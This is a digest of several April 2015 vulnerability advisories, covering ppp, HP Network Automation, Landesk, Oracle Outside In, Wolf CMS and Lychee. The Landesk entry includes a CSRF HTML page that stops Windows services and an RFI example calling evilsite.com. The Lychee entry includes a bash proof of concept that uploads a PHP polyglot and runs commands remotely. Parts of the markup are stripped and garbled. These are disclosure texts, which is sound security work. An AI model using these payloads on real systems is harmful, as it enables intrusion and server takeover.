[SECURITY] [DSA 3228-1] ppp security update

2015-04-16 Thread Sebastien Delafond
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3228-1   secur...@debian.org
http://www.debian.org/security/Sebastien Delafond
April 16, 2015 http://www.debian.org/security/faq
- -

Package: ppp
CVE ID : CVE-2015-3310
Debian Bug : 782450

Emanuele Rocca discovered that ppp, a daemon implementing the
Point-to-Point Protocol, was subject to a buffer overflow when
communicating with a RADIUS server. This would allow unauthenticated
users to cause a denial-of-service by crashing the daemon.

For the stable distribution (wheezy), this problem has been fixed in
version 2.4.5-5.1+deb7u2.

For the upcoming stable distribution (jessie) and unstable
distribution (sid), this problem has been fixed in version 2.4.6-3.1.

We recommend that you upgrade your ppp packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQEcBAEBCAAGBQJVL2reAAoJEBC+iYPz1Z1knigH/3VwF1EmHuFPoxe3shWov7+9
8emJ34eqfLhO2rkZ/gXntad+1uhBcNVIAhMOL0vQXaih8vfNSxG7gydqNg8CVjKn
k2CBWo8lPD/CBjpjn7XbxzcdJrayX+E+Pj87W8StsjlzRMawrCFN3ptKUhPn961V
ZwdG9wQzdtunlWy7mHYdE9/inlV/mLaC2Q9/tC2Iew3/Su0gCpyEFjJ3lGs55B4d
4JzOwnzrXtrdFTOUME9FGog8KNAr16w1kQ1ii6++PoAJV1p/mMGwrRccQA5j6F4r
OlyyPRuncASH4xwO3NzaDBcSHXzs+TaERxatYWW9kIeTr2eEel+NE8POCiCKy5w=
=KXp8
-END PGP SIGNATURE-



[security bulletin] HPSBMU03264 rev.1 - HP Network Automation, Multiple Remote Vulnerabilities

2015-04-16 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04574207

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04574207
Version: 1

HPSBMU03264 rev.1 - HP Network Automation, Multiple Remote Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-04-15
Last Updated: 2015-04-15

Potential Security Impact: Multiple remote vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Network
Automation. These include Cross Site Request Forgery

(CSRF), Cross Site Scripting (XSS), clickjacking and other vulnerabilities
which can be used to create remote exploits.

References:

CVE-2014-7886
VU#750060
SSRT101865

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Network Automation v9.0X
HP Network Automation v9.1X
HP Network Automation v9.2X
HP Network Automation v10.X

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-7886(AV:N/AC:M/Au:S/C:P/I:P/A:P)   6.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following updates and information available to address these
vulnerabilities in HP Network Automation.

Note: Customers running Network Automation v9.0X and v9.1X should upgrade to
v09.22.02 to resolve these issues.

Network Automation Patch v09.22.02: NA_00027
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea
rch/document/KM01512941

Network Automation Patch v10.00.01: NA_00028
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea
rch/document/KM01512943

See Knowledge Document for further configuration information:
https://softwaresupport.hp.com/group/softwaresupport/search-

result/-/facetsearch/document/KM01411842

HISTORY
Version:1 (rev.1) - 15 April 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlUu3sQACgkQ4B86/C0qfVmrngCffhWHa2TLzf7x2XGUwK54dXnE
2tMAnR0B6tyjj14ZPHADJte6ytb4tGyI
=sl7r
-END PGP SIGNATURE-


[CVE-2014-5361][CVE-2014-5362]Landesk Management Suite RFI CSRF Security Vulnerabilities

2015-04-16 Thread alex_haynes
Exploit Title: Landesk Management Suite RFI and CSRF vulnerabilities
Product: Landesk Management Suite
Vulnerable Versions: 9.5 (and possible previous versions), 9.6
Tested Version: 9.5
Advisory Publication: 16/04/2015
Latest Update: 16/04/2015
Vulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion 
[CWE-829]
CVE Reference: CVE-2014-5361, CVE-2014-5362
Credit: Alex Haynes

Advisory Details:


(1) Vendor  Product Description


Vendor:
LANDESK

Product  Version:
Landesk Management Suite v9.5

Vendor URL  Download:
http://www.landesk.com/products/management-suite/

Product Description:
Manage all your users’ multi-platform desktops and mobile devices. Integrate 
several IT disciplines
into a single management experience that speeds software distribution, ensures 
software license compliance,
simplifies OS provisioning, saves power costs, provides secure remote control, 
and manages Mac OS X.


(2) Vulnerability Details:
--
The admin interface of Landesk Management Suite can be exploited by Remote File 
Inclusion (RFI) and Cross-site Request forgery (CSRF) attacks.

Proof of concept for CSRF [CVE-2014-5361]:
-
URL: 
https://LANDESK/remote/serverServices.aspx?cidn=5d=serverServicestb=serverInfo_services.tbgid=groupSW_Servicesitemid=SW_ServicesUID=SW_Services_SW_ROOT
Attack Pattern: 

Certain functionalities of landesk are vulnerable to cross-site request 
forgeries, which can be used to force users to, among other things,
manipulate windows services and processes on  host machines. 

Example code below:
!-- CSRF for Landesk, allowing stop, start or restart of arbitrary services OR 
processes on host machine --
html
head
script
!-- For illustration only, Skype and Adobe Acrobat Update Services are shut 
down / Replace with any windows service on host machine --
window.onload = function() {
document.getElementById(csrfForm1).submit();
document.getElementById(csrfForm2).submit();
}

/script
/head
body
form id=csrfForm1 
action=https://landesk/remote/serverServices.aspx?cidn=5d=serverServicestb=serverInfo_services.tbgid=groupSW_Servicesitemid=SW_ServicesUID=SW_Services_SW_ROOT;
 method=POST enctype=multipart/form-data target=csrfIframe1
  input type=hidden name=op value=stop /
  input type=hidden name=name value=Adobe Acrobat Update Service /
/form

form id=csrfForm2 
action=https://landesk/remote/serverServices.aspx?cidn=5d=serverServicestb=serverInfo_services.tbgid=groupSW_Servicesitemid=SW_ServicesUID=SW_Services_SW_ROOT;
 method=POST enctype=multipart/form-data target=csrfIframe2
  input type=hidden name=op value=stop /
  input type=hidden name=name value=Skype Updater /
/form

iframe style=display:hidden height=0 width=0 frameborder=0 
namecsrfIframe1/iframe   
iframe style=display:hidden height=0 width=0 frameborder=0 
namecsrfIframe2/iframe
/body
/html


Proof of concept for RFI [CVE-2014-5362]:
-

There are numerous URLs within the landesk management suite that can be used to 
call upon remote files due to the use of relative paths.
This can be leveraged to introduce remote file inclusion vulnerabilities as you 
can present external content through the landesk server.

URLs:
https://LANDESK/ldms/sm_actionfrm.asp?cmd=dirht=1d=//RFI here
https://LANDESK/remote/frm_coremainfrm.aspx?tb=cust_qry.tbd=//RFI 
herebfn=swd_topnode=4baseType=group1groupID=1646groupType=nullownerID=56
https://LANDESK/remote/frm_splitfrm.aspx?top=//RFI 
herettb=dirman.tbftr=frm_tasktabsfrmtabf=dirman_tabstf=dirman_topbottom=frm_taskfrmbbd=SoftwareDistribution/ldaplistbf=dirlist_bottombd=frm_coremainfrmbtb=dirlist.tbpct=50

Parameter names: d  top
Parameter Type: GET
Attack Pattern:
The Remote File must finish in .aspx but the extension is not referenced 
explicitly in the URL. It will be fetched in HTTPS.
d=//any external URL here/filenamehere(.aspx)
example:
https://LANDESK/ldms/sm_actionfrm.asp?cmd=dirht=1d=//evilsite.com/myevilaspxfile


(3) Advisory Timeline:
--
15/09/2014 - First Contact
23/10/2014 - Request for update on fix. No ETA given.
21/11/2014 - Request for update on fix. No ETA given.
22/12/2014 - Request for update on fix. No ETA given.
22/01/2015 - Request for update on fix. No ETA given.
13/04/2015 - Final request for update and notice of public disclosure given. No 
ETA for fix.
16/04/2015 - Public disclosure

(4)Solution:

No fix at this time.


(5) Credits:

Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362


Secunia Research: Oracle Outside In ibpsd2.dll PSD File Processing Buffer Overflow Vulnerability

2015-04-16 Thread Secunia Research
== 
 
Secunia Research 16/04/2015  

   Oracle Outside In ibpsd2.dll PSD File Processing
   Buffer Overflow Vulnerability

== 
Table of Contents

Affected Software1
Severity.2
Description of Vulnerability.3
Solution.4
Time Table...5
Credits..6
References...7
About Secunia8
Verification.9

== 
1) Affected Software


* Oracle Outside In versions 8.4.1, 8.5.0, and 8.5.1

== 
2) Severity 

Rating: Moderately critical
Impact: System Access
Where:  From remote
 
== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to compromise a vulnerable
system.

The vulnerability is caused due to a sign extension error in
ibpsd2.dll when processing PSD files, which can be exploited to cause
a heap-based buffer overflow.

Successful exploitation of the vulnerability may allow execution of
arbitrary code.

== 
4) Solution 

Apply update. Please see the Oracle Critical Patch Update Advisory for
April 2015 for details.

== 
5) Time Table

11/02/2015 - Vendor notified.
11/02/2015 - Vendor response.
12/02/2015 - Vendor supplied bug ticket ID.
24/02/2015 - Vendor supplied information of fix in main codeline.
13/03/2015 - Vendor requested delay of disclosure.
16/03/2015 - Replied to vendor and requested a new estimated date.
16/03/2015 - Vendor replied that estimated date will be investigated.
19/03/2015 - Vendor supplied 14/07/2015 as estimated fix date.
24/03/2015 - Vendor supplied status report.
10/04/2015 - Vendor supplied 14/04/2015 as estimated fix date.
14/04/2015 - Release of vendor patch.
15/04/2015 - Public disclosure.

== 
6) Credits 

Discovered by Dmitry Janushkevich, Secunia Research.

== 
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2015-0493 identifier for the vulnerability.
 
== 
8) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-2/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==  


Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability

2015-04-16 Thread prathan . ptr
  ,--^--,,-,---^--,
  | |   `' |  O .. CWH Underground Hacking Team ..
  `+---^--|
`\_,---, _|
  / XX /`| /
 / XX /  `\   /
/ XX /\__(
   / XX /
  / XX /
 ((  
  `--'
  
 Exploit Title   : Wolf CMS Arbitrary File Upload Exploit
 Date: 16 April 2015
 Exploit Author  : CWH Underground
 Discovered By   : ZeQ3uL
 Site: www.2600.in.th
 Vendor Homepage : https://www.wolfcms.org/
 Software Link   : 
https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip
 Version : 0.8.2
   

SOFTWARE DESCRIPTION

   
Wolf CMS is a content management system and is Free Software published under 
the GNU General Public License v3. 
Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog 
CMS.
   
###
VULNERABILITY: Arbitrary File Upload
###

This exploit a file upload vulnerability found in Wolf CMS 0.8.2, and possibly 
prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file into the application 
with authenticated user, which results in arbitrary remote code execution.

The vulnerability was found on File Manager Function (Enabled by default), 
which provides interfaces to manage files from the administration. 

In this simple example, there are no restrictions made regarding the type of 
files allowed for uploading. 
Therefore, an attacker can upload a PHP shell file with malicious code that can 
lead to full control of a victim server. 
Additionally, the uploaded file can be moved to the root directory, meaning 
that the attacker can access it through the Internet.
   
/wolf/plugins/file_manager/FileManagerController.php (LINE: 302-339)
-
// Clean filenames
$filename = preg_replace('/ /', '_', $_FILES['upload_file']['name']);
$filename = preg_replace('/[^a-z0-9_\-\.]/i', '', $filename);

if (isset($_FILES)) {
$file = $this-_upload_file($filename, FILES_DIR . '/' . $path . 
'/', $_FILES['upload_file']['tmp_name'], $overwrite);

if ($file === false)
Flash::set('error', __('File has not been uploaded!'));
}
-

#
Disclosure Timeline
#

[04/04/2015] – Issue reported to Developer Team
[08/04/2015] – Discussed for fixing the issue


# Greetz  : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, 
Win7dos, Gdiupo, GnuKDE, JK, Retool2



Lychee 2.7.1 remote code execution

2015-04-16 Thread Filippo Cavallarin
Advisory ID: SGMA15-002
Title:  Lychee remote code execution
Product: Lychee
Version: 2.7.1 and probably prior
Vendor: lychee.electerious.com
Vulnerability type: Remote Code Execution
Risk level: High
Credit: Filippo Cavallarin - segment.technology
CVE: N/A
Vendor notification: 2015-04-12
Vendor fix: 2015-04-13
Public disclosure: 2015-04-15


Details

Lychee version 2.7.1 and probably below suffers from remote code execution 
vulnerability.

The vulnerability resides in the importUrl function that fails to restrict file 
types due to the lack of file extension validation.
Since the imported file is stored in a web-readable directory where php files 
can be executed, remote code execution can be achieved. 

Even if the import is limited to image files only, an attacker can abuse this 
vulnerability by importing a 
specially crafted image file containing PHP code.

To exploit this vulnerability the attacker must be logged as administrator.

The following proof of concept demostrates the issue

#!/bin/bash

LYCHEE_HOST=lychee.local
PHPSESSID=e0ac560kmqf0lli9u5jd20qt46
LOCALIP=172.16.85.1
CMD=uname -a

cd /tmp || exit 1

echo Creating gif...
GIF=\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A?php
 system('$CMD')?
echo -e $GIF  gif.php

echo Starting local webserver
python -m SimpleHTTPServer  /dev/null 21 

sleep 1

echo Starting the import procedure
curl http://$LYCHEE_HOST/php/api.php; -H Cookie: PHPSESSID=$PHPSESSID  
--data function=importUrlurl=http%3A//$LOCALIP:8000/gif.phpalbumID=0

sleep 5

kill %1
rm gif.php

echo Executing command..
curl http://$LYCHEE_HOST/data/gif.php;

#EOF


Solution

Upgrade to Lychee version 2.7.2


References
http://lychee.electerious.com




Filippo Cavallarin
https://segment.technology/